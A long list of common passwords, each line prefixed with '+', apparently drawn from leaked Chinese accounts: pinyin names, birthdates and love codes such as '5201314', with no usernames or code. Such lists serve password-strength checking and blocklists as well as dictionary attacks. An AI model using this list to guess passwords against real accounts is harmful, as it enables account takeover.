+steven123 +wr123456 +zhanghao123 +19851214 +19891120 +123456f +19891223 +19891228 +556688 +hm123456 +880921 +zhangbin +19871126 +zhouwei +tian123456 +520520qq +19881008 +wang0000 +woaini1984 +apple1234 +19900525 +shuai521 +wanglong +123456789liu +aaa123321 +19861114 +880910 +19871216 +jordan +spring123 +liuyu520 +qaz159357 +loveyou1 +tang1314 +19871102 +5201314bb +19901021 +yangyang11 +831028 +123110 +198732 +yuan1314520 +123456hu +19841129 +11112222 +operation0 +520520aa +19870217 +12345qq +nishiwode +yueyue521 +yangxu123 +198782 +a123520 +kiss123 +chuanqi123 +wuhan123 +wz5201314 +821001 +lz5201314 +wangwen520 +987456 +orange123 +chao123 +qazxsw +zhangkai +520888 +xf5201314 +yue123456 +william +wahaha123 +change +zhao1990 +qq7758520 +19861204 +881216 +19891024 +5201314qwe +liuxing520 +zj123456789 +beyond520 +shao123456 +zhang5337 +asdfg123456 +19870113 +881210 +chenxin123 +huang1230 +asd1230 +nokia3230 +xiao1983 +19860901 +5211314z +freedom +xiaobai +a1b2c3d4e5f6 +f5201314 +wangye123 +qweasd456 +wangjian520 +woshinidie +19870817 +w123321 +li111111 +asdw1234 +rinima123 +s111111 +245437 +3396815 +5aini1314 +wodemima1 +love4ever +19861004 +qwe456 +ying1314 +1qazxcvb +king1988 +feng1988 +19870727 +ding123456 +861213 +198921 +tang1234 +qianqian123 +abc13579 +198619 +123happy +love1212 +aini1988 +lidong123 +aa1111 +zzzz1111 +850214 +caonima9c +881112 +money123 +xiaoqiang123 +nana123 +789852 +lw5201314 +asdfghjkl456 +wei1314520 +19880808 +007008 +881207 +xiaohu123 +qq456123 +19881109 +123456haha +a789456123 +wangbo +19881021 +nana521 +aa12345 +abc111111 +qqqwww123 +song1985 +xiaxia520 +123123as +19860101 +cs5201314 +19841012 +houzi123 +woaini962464 +lulu520 +00000a +wokaonima +198819 +niuniu520 +52babamama +fanfan123 +618618 +wf5201314 +890815 +z11111111 +liuchao123 +woaini312 +haozi123 +19851019 +xiaofeng123 +192837465 +aiziji521 +811020 +1234568 +123456j +lele123 +wangkai521 +liuyi123 +198300 +123qaz123 +nm123456 +123456sy +861125 +861128 +516516 +861228 +112233qwe +baggio +aiziji +19881006 +5201314zl +841015 +tiantian1 +gaolei123 +english123 +821125 +123456ppp +chenhui123 +123456zq +shanghai +nishizhu123 +19861230 +19851021 +199099 +qqqqqq11 +xiaobai521 +1986926 +hui123 +ly000000 +851214 +xing1234 +kaikai521 +bbmm520 +love2001 +woaini5210 +a1234321 +199088 +mm123123 +love1991 +19881126 +zxx123456 +159753abc +kangta1010 +19841125 +19841121 +123321zxc +7758521s +woai123456 +gs123456 +qaz1314520 +y7758521 +kingking +841018 +851126 +forever521 +321asd321 +diablo +xiaoyue520 +aizhu1314 +198721 +811017 +858585 +yumen123 +19891214 +123aa123 +19870603 +111333 +19880218 +liu123321 +19890210 +wangli520 +a321321321 +123123z +long1989 +891215 +kl123456 +890713 +xin5201314 +jiao123 +123456QQ +415415 +520184 +tiantian521 +qq1230 +00112233 +871203 +xue123456 +841127 +good123 +lingling520 +151515 +xx112233 +guang123 +126126 +881018 +881017 +881012 +andy1986 +woshishei123 +131415926 +tobeno1 +tang1986 +520baobao +aide94ni +xiaobo123 +qq12315 +yx5201314 +mo123456 +19871222 +lining123 +sm123456 +199052 +841212 +huanghe123 +891012 +901022 +821228 +1122334a +621621 +love2009 +521241 +wohenni1314 +1loveyou +123698741 +19861006 +seven777 +321654987 +xiaohua520 +fang1989 +12qwas +369958 +3135134162 +123a456s +19871212 +only1314 +19890214 +xiaoliang +841005 +hewei123 +5201314ww +WOAINI1314 +aa147258 +iloveu1314 +qq1111111 +qq520123 +shao123 +198691 +123q123 +123456wu +woshishen123 +a110110110 +19841023 +19841026 +515253 +duoduo520 +19871108 +qw1314520 +wan520 +jia5201314 +741258 +daohaosi88 +fs123456 +123456wen +19881029 +19901212 +aa654321 +as7758258 +1qaz2WSX +19890101 +zxcvbnm12345 +ch3ch2oh +meimima123 +song1988 +woaini100 +jack1234 +5loveyou +881028 +523523 +5201314wei +258852 +chenhao +tvxq031226 +qiqi1314 +wangqiang123 +chenfeng +zhou1992 +g123456789 +128128 +123456cq +wangyong +860911 +19881019 +chenjie +aa123654 +zhuwei123 +xiaomao123 +121800 +a2525775 +wzx123456 +woaini119 +jay520 +lll123456 +wang1980 +19891121 +198861 +xuliang123 +xuhao123 +yangjie520 +123459 +100200a +19871121 +police110 +zhouhao123 +zaqwsx123 +zxasqw123 +19880324 +19831216 +iloveyou99 +wanghui +19881201 +xiaolei123 +a123a456 +xingfu521 +kai123456 +x12345 +aa321321 +wangtao +791120 +19921010 +326326 +love7758521 +19841115 +yk123456 +love7758 +china521 +wangdan520 +19870522 +19870521 +hc123456 +chenchen521 +851230 +asdfjkl +woaini10 +abc123654 +youyou123 +123456yl +shuai1314 +111111qqq +198822 +kevin520 +c1314520 +aiziji123 +871121 +gundam0083 +159357a +123.123 +19880201 +19880202 +53542316 +111111qaz +zxw123456 +214214 +258000 +851121 +asdasd11 +lf123456 +147258asd +19881228 +xinxin +zhao1985 +19871208 +liqing520 +km123456 +chenlei +wang1111 +zhangmin +19891012 +19891014 +wangfei520 +19891210 +xie123 +19870102 +qq1122 +guoguo520 +881120 +huangyu520 +xingxing123 +aini10000 +sun12345 +xuan123 +ct123456 +sheng520 +xiaodong +baby521 +chenlin123 +871223 +majun123 +woaiqq1314 +woaita1314 +19871210 +19871219 +998877 +19880102 +chenxiao +19861202 +881211 +shinhwa520 +shuijing +19870828 +sorry521 +198513 +19821022 +881215 +qazwsx1 +a12369874 +881011 +tang1988 +19870622 +19861012 +woaini20 +628628 +liang1983 +woaini520520 +841014 +jie123 +f1314520 +a456789 +wanggang +litao521 +1986wang +7758521x +xiangxiang +19861105 +12369874a +19891215 +ming1314 +jason1220 +Iloveyou +liuxing123 +westlife +x5211314 +feng1984 +1212qwqw +liyuchun310 +aaa1314520 +hello1234 +peng123456 +dandan +19870801 +chrislee310 +woailuo123 +abcde123456 +517517 +xiaobin520 +zhangcheng +hanxiao520 +supervisor +lichao520 +xiangni365 +miao123456 +5201314jie +19861111 +tiantang2 +19860921 +19871101 +123456yj +861106 +lxc123456 +asd000 +123666 +woxiangni +19881101 +jiang2008 +zhangming +meng123 +19870916 +513513 +1987123 +zxc1234 +jiang12345 +xinmima123 +19860606 +881027 +19851001 +19860106 +5201314zy +19831028 +r123456 +iloveyou00 +jinlong123 +198763 +liubo123 +juanjuan520 +tong123 +820417 +qwe159357 +123456cx +198631 +19870925 +19881214 +taozi520 +luwei123 +19860411 +a55555 +19831111 +811024 +811025 +19891122 +198698 +zhanghao520 +19891222 +adsl1234 +19911028 +19911020 +yuan1987 +xiuxiu520 +liujia +zxcvbnm11 +lin123123 +a1231230 +198521 +besttth3 +liuliu66 +woohyuk35 +worinima123 +wangchen +wang123123 +fifa2000 +fifa2008 +325325 +zhangfei +pc123456 +caicai123 +257758 +871218 +woaini1983 +ch3cooh +a159753 +123456lf +19841216 +feng1982 +wh5201314 +xiaozhi521 +19891230 +yang1981 +baggio10 +801224 +l000000 +jing521 +y1a2n3g4 +880214 +19870523 +7895123a +19871987 +851215 +851213 +851218 +zx1234 +she123456 +qaz123wsx456 +851016 +19881113 +aili1314 +enter123 +19860210 +wangji1314 +jay123 +zhangxu +windows7 +314314 +zhanglin123 +19901025 +890310 +chenlin520 +851112 +19821211 +840214 +19870612 +901230 +zaq12345 +jiang1314 +jx123456 +zm5201314 +lxl5201314 +liuxiang +yongyuan +mao123 +851122 +851129 +zhaoyang +19860329 +guaiguai520 +guaiguai521 +aaaaa12345 +ak47ak47 +xiaoqi521 +0.123456 +568568 +521521a +19871002 +gu123456 +susan123 +lixiang520 +19861214 +liao1989 +987321 +198661 +19831126 +liyan521 +zhangshuai +dy123456 +123456abcde +yuwei123 +poiu0987 +861124 +881221 +yulei123 +456789abc +881123 +881124 +19870205 +z1230123 +1314520xx +123456hj +5201314lp +188452 +850726 +12345600a +xiao1992 +zhang1977 +19861128 +19861122 +19861125 +198922 +q1q2q3 +a456852 +nihao1234 +19871214 +he1314520 +abcd0123 +qian5201314 +19861205 +811229 +chenjun +beckham123 +whwgpxdr8y +liang1992 +aini5201314 +hhxxttxs +love5683 +10jqka +w31415926 +yuan2008 +198926 +xx1314520 +chen1314520 +dan5201314 +system32 +jiawei123 +caowei123 +aa159357 +haohaoxuexi123 +19861130 +211211 +19861019 +198422 +19880825 +tang520 +5201314yan +19901210 +198825 +bingbing +19901019 +zhaowei521 +cptbtptp +791028 +a10086 +871010 +871012 +z1111111 +891018 +bobo123 +19870621 +19870627 +19890623 +wall1314 +19861118 +hua123 +198781 +19851220 +19851228 +123456jia +851225 +abcde1234 +1987820 +lingling +891226 +19861102 +19861103 +19911015 +x7758521 +19871115 +xing123 +jiaojiao521 +woaiwojia8 +zxcvbnm110 +wobuzhidao123 +861211 +198011 +wangxu123 +gz123456 +woaini5211314 +tianxiadi1 +crystal123 +jing1314 +kaixin +891123 +891122 +891128 +19901027 +198488 +881115 +killer520 +xiaoli123 +890811 +zxc000 +831121 +19861119 +chuan520 +19860826 +wuyang123 +wujian123 +db2admin +xiaojun521 +zhoujie123 +852963 +xing1987 +123456dj +zhangli +loveu4ever +1234qaz +w1w2w3w4 +19881027 +19870910 +123147 +123454321 +worinima12 +qaz111 +zzz123123 +chenhao520 +dl123456 +zhangqi521 +jiujiu99 +michael123 +xd123456 +daohao748 +woshi521 +abcabc123 +1234567x +1234567y +aijia1314 +119110 +o123456789 +696969 +reko3ibm +xueer520 +yuan520 +121000 +12345zxc +porsche911 +chenchen123 +aa888888 +yy1234 +zxc321 +long1986 +yang1993 +19851014 +zhaowei +qwe123654 +19851219 +19851218 +19851211 +19891129 +19891127 +19891225 +miaomiao123 +821030 +lingling00 +xiaoxia520 +880818 +198706 +ren123 +jian1990 +asd12315 +ll123123 +yun123456 +19881105 +19881103 +jerry123 +xiaowen123 +c1234567 +xiaolei +wangyu521 +yin123456 +19881205 +19881202 +xiaomei520 +123456cy +shasha123 +19850601 +1a1a1a +jiajia1314 +candy520 +19851022 +271828 +831012 +19891018 +19891111 +831216 +13145200 +3.141592653 +19841110 +19821216 +821024 +david123 +kiss520 +5201314qaz +a5121314 +198641 +259695 +a123789 +19870526 +qq123qq +abc123def +890212 +qwerty1234 +19871107 +19910202 +admin123456 +1314bulibuqi +1230456a +weiaini1314 +fendou1314 +198877 +881107 +19851030 +1122aabb +zhaojian +861102 +wangbo521 +19881127 +891025 +821016 +yangyu123 +bbbb1111 +xiaolei520 +794613 +zjl123456 +7895123z +knight +linjie123 +zhang1314520 +zhizhi520 +taotao521 +aihui1314 +zhangjie520 +19881124 +z11111 +1314920 +527527 +19860923 +yang521 +52105210 +19881224 +19881221 +19881223 +19881229 +zj1314520 +abc159357 +020202 +qq741852 +yc5201314 +dongdong123 +gl123456 +jing1988 +19871006 +19871004 +19871009 +wangjin +xiaoming1 +wasd8456 +haiyang123 +zcy123456 +binbin521 +123456wan +zhu1314520 +tao123 +199191 +19850214 +zxc520 +xiaobei123 +yh5201314 +huang1981 +zhang321 +19870601 +ml123456 +qweqwe11 +crystal +313313 +19840823 +qq10086 +xiaolong520 +kuaile520 +xingxing520 +123456kkk +891210 +fanfan520 +19860914 +ni123456 +yangjing +tiantian520 +aiziji520 +889900 +963258 +cu2oh2co3 +198111 +deng123 +830216 +198672 +78910jqk +871208 +841128 +19870820 +yang1314520 +891002 +shine123 +qinqin521 +wanan1314 +ILOVEYOU +881013 +851014 +w88888888 +aijiao1314 +ljy123456 +kang123 +y12345678 +cb123456 +asdf1230 +iso9001 +198427 +gundam00 +yuyang +123456wh +asd110110 +liulu123 +jianghao +forever8023 +woaimama123 +fuck1234 +223366 +adgjmptw +1sheng1shi +19880618 +nokian73 +198601 +871017 +198701 +wang1978 +55665566 +xxnda1999 +wonderful +q31415926 +y1234567 +321000 +123987 +7758521w +198681 +dan123456 +19861007 +19880124 +123123zxc +19871111 +19871116 +asdfg1234 +fang1988 +cm123456 +19880917 +qwert789 +xiaomin520 +19901227 +qq789456 +19871230 +asd110 +334421 +861216 +861210 +123456... +zhu7758521 +1314zhiaini +aaa666 +110001 +19881031 +123456789ok +1234568a +198618 +ABC123456 +asd456asd +hu1314520 +pan5201314 +19890614 +19890618 +aaaaa123 +tangjie123 +861225 +158158 +19841027 +19861117 +liming +daniel +1949101 +52013140 +zyy123456 +881125 +iloveyou2 +jw123456 +jin5201314 +hanwei123 +112200 +789520 +baichi520 +19881104 +lijian520 +16899052 +zeng123456 +851023 +wenjie520 +19890920 +19890306 +19890208 +weixiao123 +ruirui521 +dh123456 +lsy123456 +wangqi +198886 +meng1234 +duan123456 +qs123456 +198491 +831024 +niu123456 +881029 +kang123456 +doudou +19851104 +19851102 +qqaazz123 +peipei520 +admin110 +19901102 +000001 +123456ty +jinjin520 +yanzi123 +wwf123456 +asd456852 +chenhui520 +zhanglong +asd12300 +henry123 +123abcde +lineage2 +bj2008 +hai123456 +pa55word +102030a +900203 +woaini521521 +998998 +as1314521 +xiaolong1 +family +5201314qw +198752 +19851217 +123456o +123456jy +19891226 +520111 +123450 +19841009 +19851116 +lixin520 +aa0000 +666666abc +li159357 +tianxia1 +nokia7610 +wangcheng +yf5201314 +monkey123 +haoren123 +198523 +xyz123 +19880926 +861129 +162534 +loveyu1314 +b5201314 +zhuang +52wj1314 +qwer789 +mima1314 +lenovo +caonimabi1 +shitou123 +19860201 +mimashi520 +haha1234 +871213 +1314520ss +lzc123456 +candy123 +li1314521 +woshiwo1 +19871020 +a123456+ +gaoyuan +xia123 +aaa110 +52ww1314 +123000qq +forever1 +yuan5201314 +xiaowen520 +xiang1987 +yingying123 +manman521 +yangtao520 +901228 +yang12345 +19870629 +5211314mm +qq000123 +a12345679 +111111111 +long2008 +123456a1 +wangxin520 +windows0 +qqqqq11111 +y5211314 +881201 +zhangjian1 +871214 +789654 +19901026 +kevin123 +wang7758521 +huangbo123 +js123456 +198651 +5201314ss +chen1025 +love1999 +love1992 +871123 +xiangni123 +ssssss +qy123456 +19870610 +19870613 +19870614 +asdasd321 +j5201314 +lei5201314 +guochan007 +jimmy123 +851223 +qiuqiu123 +lcy123456 +why123456 +871005 +820817 +wang8888 +19840214 +bin123456 +52ni1314 +liudong123 +12345678w +wzy123456 +xb123456 +198723 +huang1984 +bama521 +jun123 +wode1314 +ly123123 +19891218 +19891213 +19841130 +qiu123456 +jianxin123 +iloveu +suibian8 +19870606 +wangliang1 +841216 +969696 +linlin00 +qazwsx11 +wei7758521 +summer520 +baozi520 +562059487 +liwen123 +aiyou1314 +long1985 +aaa123aaa +11231123 +green123 +fang520 +zhao1992 +yang2010 +liyuan123 +5201314dd +ysm353000 +zhaohui123 +acac0101 +2w3e4r5t +851212 +123456qi +tangwei123 +wangtao521 +liyong520 +welcome123 +811226 +811227 +811228 +happy888 +871002 +qwe7758258 +liuchang +zxcvbnm000 +19870824 +woshi1986 +901018 +foreverlove +zh5201314 +881219 +00000ooooo +891222 +wujun123 +leilei +wangwang1 +881019 +wang1225 +ljj123456 +panda123 +yangwei123 +william1 +198796 +yangguang +19860902 +612612 +123456789. +369258147a +861020 +861023 +tangtang +liuhui123 +yujie123 +aiyu1314 +zhong520 +1QAZ2WSX +mm520520 +wanghuan +19870816 +abc654321 +841013 +861212 +7758521aaa +xiaobao521 +901023 +901028 +891130 +ma5201314 +313131 +asdf7410 +meng521 +881105 +881106 +11111aaaaa +abc520 +881005 +147852aa +19851227 +7654321a +123.com +zz123456789 +19861109 +19860816 +xq5201314 +wangming +19871113 +19871114 +11111qqqqq +fang1987 +liliang520 +198519 +feifei1314 +asd7758258 +liujun +tian1314 +xiaojie123 +makai123 +19891026 +1989119 +yangyi123 +114114 +19881030 +dddddd +lixiang +198614 +841209 +dangerous +19870802 +money521 +520liwei +aini1989 +19831021 +tiancai45 +aiyan1314 +lihui123 +851206 +gaoyan123 +y1314520 +laoshu520 +wy1314520 +elva1087 +xiaoxin +878787 +lian1314 +shen1314 +lizhi123 +jaychou123 +q7777777 +woshizhu1 +123456lz +sq5201314 +1887415157 +cl5201314 +19841029 +5201314c +zn123456 +520music +mingming521 +zhang008 +fang1991 +198500 +qq211314 +7415963 +wangrui520 +801024 +youyou520 +qingqing521 +woaini1413 +zhengwei +851028 +851022 +851026 +271314 +19890815 +aaaAAA111 +0932313521 +wanglei110 +ab12345 +yuchao123 +luowei123 +861011 +zhangkun +qw12345 +s1314520 +zxc1230 +19890703 +yuan1990 +198881 +wode123 +880219 +xyz5201314 +zhangyan123 +881024 +881023 +aimin1314 +123456hua +789456qwe +qwqwqw +qq1234560 +daohao444 +19851106 +19831025 +woaishui +chenjing +woaijj1314 +lzy123456 +as123456as +19841014 +yanzi521 +111111qw +huang001 +zhangwen +liuwei1987 +weilai123 +880318 +880310 +891218 +456123qq +woai1988 +870611 +liuxing +123qwe456rty +zhang999 +lijia521 +870214 +19860318 +aaaa123456 +s12345678 +woaini1993 +zhenxi1314 +wanghua123 +141242 +wzw123456 +xiaoxiao00 +chang520 +qwe159753 +831106 +19860114 +19821229 +840310 +198815 +mima12345 +19841003 +huangtao +edison520 +jm123456 +pengpeng +861121 +851202 +870601 +101112 +aiqing1314 +19870811 +kiss1234 +123456789ll +wanglei1 +linan123 +no89757 +y123123 +841017 +123QWEasd +woaiziji1 +caicai521 +aixin1314 +19871029 +123456zc +19851027 +19851024 +19831009 +hai123 +000000ab +love1983 +811031 +19891114 +831219 +1314520l +821023 +901021 +inzaghi9 +laopowoaini1314 +19821013 +801120 +19880313 +aaaa8888 +851216 +chenchen520 +851228 +818818 +19890917 +19860216 +zgmfx20a +123456zhao +zxl123 +781216 +chenchen1 +19881230 +nishishui +171717 +830915 +19870112 +886868 +shena9958 +19841204 +123654as +qweewq123 +325600 +19861229 +br13jhhrh6 +ranran123 +831021 +12345678910 +wangbo520 +chenli123 +52jj1314 +huang1993 +19891201 +19841124 +zhangwei520 +891026 +891024 +821013 +diandian +19870618 +123456a123 +wangkai +cheng1987 +001122 +19870216 +superman1 +tian1986 +797979 +1596321 +yangbo520 +zhouyang +jackie123 +5131420 +zhangyi +zhao1982 +19871204 +kitty123 +521love +123abcABC +qaz123qaz123 +123456xq +123456xz +891202 +19861219 +841230 +wz123123 +880619 +198729 +811011 +ying5201314 +821109 +880815 +aiwosuoai +zhangyang521 +870815 +xiaogang +741852963a +yangyang1 +cuicui520 +xiaokai520 +wo521521 +wenzi123 +19890813 +meinv520 +mayue123 +chenxin +aijuan1314 +jiayou +hua5201314 +52weiwei +19860815 +loveni1314 +19860911 +000000000 +ljp123456 +zhao1993 +yatou520 +zhan123 +rinima1314 +lijun521 +niub74110 +gao5201314 +19880108 +19880101 +19911210 +19861207 +dingding +120110 +kangta +huahua +jiandan2 +871102 +821110 +inuyasha +880828 +901010 +abc456 +19870310 +qq2010 +522008 +282828 +hujun123 +891225 +456852asd +chenxu123 +liujia520 +sunny520 +3838438 +198425 +19880824 +19880826 +198562 +123456789k +hubin123 +xiang1314 +19901018 +dq123456 +wxy123456 +0.0.0. +yongyuan21 +qwe123789 +871018 +liang1986 +19890120 +jiangtao123 +138138 +cheng1314 +19870626 +anjing +19860521 +zhu5211314 +meng520 +aiwei1314 +881006 +feixiang +aimei1314 +tang1989 +majun520 +123698 +19851128 +891224 +100200abc +guowei520 +19880916 +860329 +yyy123456 +wu5201314 +861010 +781108 +19871231 +cp123456 +19830429 +yu123123 +wangpeng521 +worini88 +830315 +yz123456 +9638527410 +shen1987 +871024 +871026 +19870902 +521888 +zxh123456 +19890216 +19860603 +abc110 +19851107 +871025 +7777777a +1987112 +111999 +781218 +880123 +19880905 +19880908 +821130 +861003 +xx520520 +123456luo +a456123 +19890520 +aaa111222 +19881107 +870629 +zhangying123 +0000000000 +19890925 +654321qq +19890204 +ruirui520 +qw000000 +z00000 +125800 +qazwsx741 +shang521 +zhangying +909090 +min123456 +bj20080808 +881020 +103103 +19851109 +19851205 +xiaoai520 +198733 +xiaoyu88 +nishizhu1 +218218 +liuwei1989 +zhangyi1 +12301230qq +nannan123 +wangxu +198818 +tiancai520 +19870708 +yangli520 +198588 +zhangjun123 +a1232123 +yingying521 +123456987 +123456789mm +xin7758521 +199022 +19860316 +122100 +841029 +841024 +19821005 +19890714 +love1111 +521baobei +woxihuan +aa11bb22 +liuxu123 +19860611 +19890721 +19880304 +yanlei123 +stefanie +19851012 +87654321 +mima2008 +qing123 +811021 +515151 +198862 +stone123 +c123123 +zhangliang +q12301230 +wocaonima0 +198461 +19850628 +19880323 +msconfig +454545 +198526 +831127 +880202 +cai5201314 +x000000 +851208 +880501 +ming1985 +wojiao123 +zheng521 +xiaofei520 +zzl123456 +851107 +zhangning +19860202 +jingjing1314 +kangta520 +sunwei123 +871211 +caicai520 +19841210 +yaoyao +588588 +900114 +zhangjing123 +zhanglu123 +a1234569 +xuwei520 +zhangbo +a1b1c1d1 +167669123 +sunshine1 +132456 +yaoyao11 +tomorrow +159357abcd +831213 +woaili1314 +19841117 +19821210 +312312 +dsa123 +yangli123 +19821019 +19901123 +801126 +901125 +q0000000 +860520 +meng1983 +19900515 +19870528 +19831226 +860120 +19890519 +wangjian1 +jing1991 +bbmm5201314 +Welcome1 +626626 +123chen +sweet123 +duan123 +890618 +lyl123456 +123456jin +19901028 +19901022 +xuanxuan520 +hx5201314 +yuhao123 +19861222 +871127 +qw123456789 +zw5201314 +19891208 +1988727 +asdewq123 +19870611 +1008611 +wohenaini +19880609 +jerry520 +chenxi123 +vivian +chao1987 +qwe789789 +198917 +880328 +880421 +zhangyong +baiyu123 +kaonima123 +hacker +liujing +199111 +1234321a +871021 +qiuqiu520 +000000z +ligang123 +loveu1314 +zhao1986 +windows520 +19871205 +nihaoya123 +901224 +784512 +zhangxin123 +19871003 +nokia5800 +mima0000 +nihao111 +lxl123456 +132435 +198728 +871111 +123456Ab +a2121241 +lavender +811013 +811010 +758258 +q1234560 +525252 +821101 +zheng1991 +821006 +aijie1314 +19870604 +wawj1314 +1457521 +fly123456 +a110110a +19870104 +woshishui0 +lifeng123 +lilin123 +19870309 +sky5201314 +xiaoqin123 +851231 +xiaokai123 +jinchao123 +jay1314520 +yangyang21 +330324 +123456aaaa +19860915 +wangnan521 +beyond1983 +zhoulei123 +qwe1234567 +zxy5201314 +Iloveyou1314 +cherry123 +520520a +loveyan1314 +19841222 +xiaoxue123 +131452 +860821 +chuan1314 +woaiwoziji1314 +wq7758521 +woailing1314 +19861209 +qwerty789 +wuyan520 +19870821 +liurui123 +890214 +AIni1314 +19880225 +19870116 +ff123123 +201314love +bai123 +ya123456 +ge123456 +19860906 +19841002 +secret123 +31415926535 +123456wx +19890919 +zhangrui +P@ssw0rd +19901219 +A100s200 +wangchao88 +leo123456 +ning123456 +19851115 +80238023 +huihui +chinaren +334455 +19860404 +a12344321 +hong123 +weili520 +womendeai123 +871011 +wenzi520 +mayday555 +lifei521 +841016 +showme123 +891017 +198777 +qq3344521 +a963852741 +wu123123 +901026 +peng1987 +801220 +19890628 +gb123456 +ljw123 +821223 +821221 +821224 +shasha521 +910910 +19870125 +gaoxiang +gaoyuan123 +890821 +hao123123 +198682 +xiang123456 +dong1987 +asdasd111 +123asdzxc +891220 +19911012 +19860818 +cxz123 +ls5201314 +wangxiao +871201 +shanghai123 +090909 +fangfang +1a2b3c4d5f +123456qwert +jkl123456 +521999 +1989112 +nihaoa +5213344a +cc1314520 +123581321 +sunyu123 +xujie123 +123zzz +841108 +zhao1314 +159357qq +yigeren1314 +zhangjun520 +yuan1314 +891129 +only13 +19860517 +king1314 +19870909 +198581 +wode1989 +woaini333 +19890820 +521521qq +19860116 +198695 +1qa2ws3ed4rf +19811026 +ashin1206 +198561 +yp123456 +19901116 +zhang168 +198402 +dongdong521 +19830211 +chaochao +qq111222 +801023 +530520 +zxcv12345 +55555a +xiaoxu521 +1989121 +huang1 +123456dx +19830615 +ailin1314 +adidas +miao123 +zwx123456 +a1233210 +qwaszx1234 +long520 +1989525 +zl123456789 +sunshine123 +shiyu123 +l123123 +qiu5201314 +zhangyan520 +qw12qw12 +pw123456 +zhangmeng +198976 +lucky123 +song1984 +wo1314aini +hui1314520 +maple520 +qq88888888 +xuan1314 +123123ab +shangxin1 +li520520 +19851006 +19851008 +19840929 +850520 +19851108 +liang007 +jian1234 +19891130 +jessica +foxconn88 +wangqiang1 +a74107410 +zhuyan123 +qing123456 +xuexue520 +520119 +198417 +19880815 +19880816 +wangxue123 +xujia123 +861113 +jing1234 +123456789abcd +123asdf +zxc1314520 +xiaowu123 +ce551029 +kaixin365 +wanan520 +zj123123 +gaoyang +66666666 +199029 +19841123 +19881219 +woaizj1314 +841027 +w1111111 +886886 +yan520 +810927 +z123z123 +worinima2 +qingwa520 +zhongguo +junjun1314 +1212112 +19851013 +811022 +qaz159753 +zhang123456789 +19891227 +19841105 +880926 +zc123123 +321321321a +246800 +computer1 +860214 +qaz1234 +123456sh +861127 +zxy123 +880303 +nokia6300 +ling1987 +ai7758521 +abc321 +861221 +19870812 +lijian1989 +m1234567 +890421 +19881003 +19890909 +801124 +tx123456 +song1991 +woaini1985 +shinichi +asdjkl123 +821126 +821129 +19890724 +wow123456 +19841218 +19860423 +yao5201314 +zhang1121 +cindy123 +lihua123 +19851026 +wangyi520 +wen123 +19870103 +198741 +1234567aa +19891118 +x111111 +sunwei520 +811118 +3.141592654 +901024 +881016 +xiang1988 +19901122 +manman520 +sujuonly13 +001234 +12345678p +19841225 +19870329 +880210 +1985921 +5t6y7u8i +good1234 +19831223 +19831221 +19831227 +19831228 +missyou1314 +890211 +kissyou +19840220 +123123li +851010 +520100 +1987620 +13579abcd +he5201314 +zhoujian +liu520520 +a11235813 +chang1988 +wch123456 +liliang123 +19841201 +19841206 +19841205 +xiaoqiang520 +guaiguai +552200 +136136 +jianghu123 +a7758521a +zhang456 +831026 +gx123456 +zxc123asd +871129 +871128 +870926 +225588 +801210 +456123asd +19870616 +l12345678 +1986126 +english +19880203 +liushuai +zaq1zaq1 +aaaaaa111 +19880306 +shijie123 +123www +19870218 +19870212 +woaini258 +880325 +angel007 +wanghao1 +851220 +huang2008 +z123123z +101213 +1314921 +yangming +199110 +liuwei521 +19860928 +987456321 +jkl123 +891126 +xiaobo520 +000000w +lxw123456 +ting123456 +198700 +qq5213344 +9bugaosuni +890120 +wo123123 +q7895123 +xujing123 +1986zhang +liulin123 +19880115 +qq25257758 +w123123123 +a456456 +333221 +333222 +qqqqq1 +19891212 +880817 +52xx1314 +19821115 +jiang1234 +891116 +52cc1314 +19880215 +xiaoxue520 +19831983 +aidan1314 +wang1210 +1987129 +19870208 +19870204 +woaini0 +woaini12345 +316316 +zxc12300 +zyj123 +woaini8023 +000000000a +zxdsl831 +suibian +19840101 +891219 +19881130 +901019 +as112233 +890712 +000... +1987wang +music520 +871227 +zh123456789 +liujun521 +198628 +wangzi520 +19841228 +198852 +19901009 +198918 +19871110 +gt123456 +1990123 +xiaoyang123 +19880601 +wo9caonima +198112 +811224 +520mylove +123caonima +szx123456 +841122 +lichao +zzh123456 +1986819 +811120 +19891126 +901013 +4r3e2w1q +19821020 +19821024 +laopo123 +woshini1 +l12345 +881214 +201314qq +bo123456 +19870316 +123abc456def +19880118 +19821982 +198793 +wenjing520 +2008aoyun +890221 +aini10000nian +510520 +pl123456 +891221 +800820 +xiao1985 +115115 +9998877 +m5211314 +520168 +19880828 +wujian520 +happy123456 +831224 +buzhidao0 +861027 +mm1314520 +wamm1314 +198828 +wangjian123 +zyj123456 +aiyue1314 +aassdd123 +19880610 +liming520 +830103 +19890122 +yujie520 +870916 +mamawoaini1314 +861218 +010010 +198951 +19890624 +001314 +huangjun +woaini168 +881203 +woshidi1 +aa666666 +860215 +159357aa +woaini1212 +wangying521 +winnie123 +z987654321 +342623 +198528 +19840120 +xiangni1314 +19861108 +weiwei1984 +19871118 +james23 +ai5211314 +xsw21qaz +san123456 +lixiao123 +19880910 +darling520 +zhong123456 +zxs123456 +wang2009 +19901224 +861018 +wazj1314 +liujing520 +king1982 +19870421 +530530 +ding123 +19880812 +chenfei520 +1212123a +caonima11 +19880120 +198010 +niaiwoma +zzaaqq11 +525laopo +963852741a +aaaaaaaa +198613 +198617 +s31415926 +871027 +881008 +xiaojun +881003 +122122 +19870803 +wangbadan +yangkun123 +19860516 +wjy123456 +881117 +xk123456 +liang1234 +jiang007 +jiangjun +l31415926 +as1234567 +19851118 +bing1314 +19880821 +lyy123456 +900929 +dong5201314 +wzy123 +asdasdasd1 +5201314t +123456yan +chenpeng +qweasd123456 +19871106 +19871105 +871217 +19880804 +123qqq123 +xz5201314 +12345asdf +a1212123 +waini521 +gm123456 +861005 +456123a +feng1992 +850621 +q1a2z3 +5845131421 +fengzi123 +liying123 +xiangni521 +chobits +112255 +yang201314 +19890923 +135135 +aini1sheng +19860225 +liujun520 +198627 +qu123456 +870228 +19870915 +19870912 +1234567890abc +102300 +19870201 +19890108 +19890106 +19890105 +19890708 +19890702 +dream2010 +19890606 +a3838438 +song1982 +qq31415926 +7654321 +lxm5201314 +h1234567 +123456hui +19851002 +shark123 +xiaohua123 +19831014 +aa520520 +19851103 +laopowoaini +zeng1989 +wawzj1314 +a120120 +nokia3100 +huang1314520 +zhanghao1 +19880817 +lf5201314 +861114 +861112 +wxc123456 +1314520zz +19870505 +880312 +781123 +1234567h +hahaha123 +benben123 +zxc123000 +lin12345 +wangjia123 +123456cd +k5201314 +lb5201314 +jj1314520 +851110 +1988121 +19870927 +jiangwei520 +100000 +841023 +yunyun520 +mamababa520 +1q1q1q1q1q +831027 +woaijie1314 +159874 +19880308 +19851010 